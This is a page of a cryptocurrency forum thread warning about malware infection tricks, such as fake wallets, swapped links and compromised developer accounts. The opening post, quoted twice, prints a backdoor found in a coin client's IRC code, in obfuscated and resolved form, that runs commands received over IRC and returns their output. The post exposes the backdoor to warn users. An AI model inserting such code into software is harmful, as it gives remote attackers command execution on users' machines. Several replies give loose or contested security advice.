Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 41. (Read 689649 times)

sr. member
Activity: 588
Merit: 351
I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.
hero member
Activity: 1190
Merit: 568
Sovryn - Brings DeFi to Bitcoin
correct me if im wrong but maleware its generecly for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of reteiving passorws from the users and other stuff from enven pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

We need to be vigilant in all our actions. We should look to the link above the browser everytime we are opening it. Hackers may hack our account by making us fool. Sometimes they are creating websites that are like be the same like the legit ones , just look to the link very carefully to avoid problems.
newbie
Activity: 8
Merit: 0
Thanks for sharing! I've added some of these malicious sites to CoinJabber.com a place for users to rate and review cryptocurrency sites...Basically yelp for Crypto

https://www.coinjabber.com/
member
Activity: 97
Merit: 10
Does this include the malware I've seen that changes any bitcoin address you copy to your clipboard to an unsavory characters bitcoin address. When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice!
sr. member
Activity: 1484
Merit: 253
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.

Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right its not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend  eset nod32 antivirus latest version now available if your search on their site online; even trial version works totally fine.
legendary
Activity: 4312
Merit: 3517
what is this "brake pedal" you speak of?
formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. its one of the surest way of getting rid of suspected virus/malware.

if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.

whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
hero member
Activity: 2926
Merit: 570
Leading Crypto Sports Betting & Casino Platform
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.
member
Activity: 62
Merit: 10
THANK YOU FOR THE INFORMATION MY FRIEND  Grin
legendary
Activity: 2128
Merit: 1120
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.
newbie
Activity: 7
Merit: 0
Thank you .. I think it is very good information for me as a beginner. I will always support you.
hero member
Activity: 1372
Merit: 564
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


thanks for informing us,however we must know how to avoid this. we all give importance to bitcoin,therfore we must take care of it. there are some kind of people that wants to earn bitcoin without giving some effort on it,they just want to take it to others easily. secure your browsers , dont click anything that is not important ,look may be deceiving brothers.
legendary
Activity: 1894
Merit: 1001
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

 there is no comprehensive overall protection, think, rather in layers. a vpn, a good antivirus, spybot s&d, hosts file (hostsman), sandboxie, a virtual machine should all be in place.

  avoid win 10
  if u use 7, 8, or 8.1, remove or do not install the microsoft spyware
   even better, use mac or linux

there is freeware available to do all this  Cheesy
newbie
Activity: 10
Merit: 0
Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
hero member
Activity: 1708
Merit: 606
Buy The F*cking Dip
is there any good anti virus to handle it??

I would like to ask this same question here. Can anyone site a software/site that can provide better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware but it wouldn't hurt if we can install a program that has good reputation in stopping malwares getting inside our machines.
hero member
Activity: 722
Merit: 500
Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
member
Activity: 116
Merit: 10
is there any good anti virus to handle it??
sr. member
Activity: 459
Merit: 251
If i use antymalwarebytes i can be protected?
member
Activity: 76
Merit: 10
Useful thread..  I always use sandboxie and shado defender before installing or running any new program now a days.. .  And mediam level of hackers fears of virustotal because they send the file for further analysis(as what i've heard)  and their FUD malware loose its FUD ability.  So my suggestion will be...  Use sandboxie or any similar software and still use softwares like shadow defender for any kind of new programs... .  And before doing any thing just scan it in virustotal if you can.

Note: just don't trust any new person or software just like that.

In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
newbie
Activity: 1
Merit: 0
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
sr. member
Activity: 264
Merit: 250
i was infected with virus lol
Pages:
Jump to: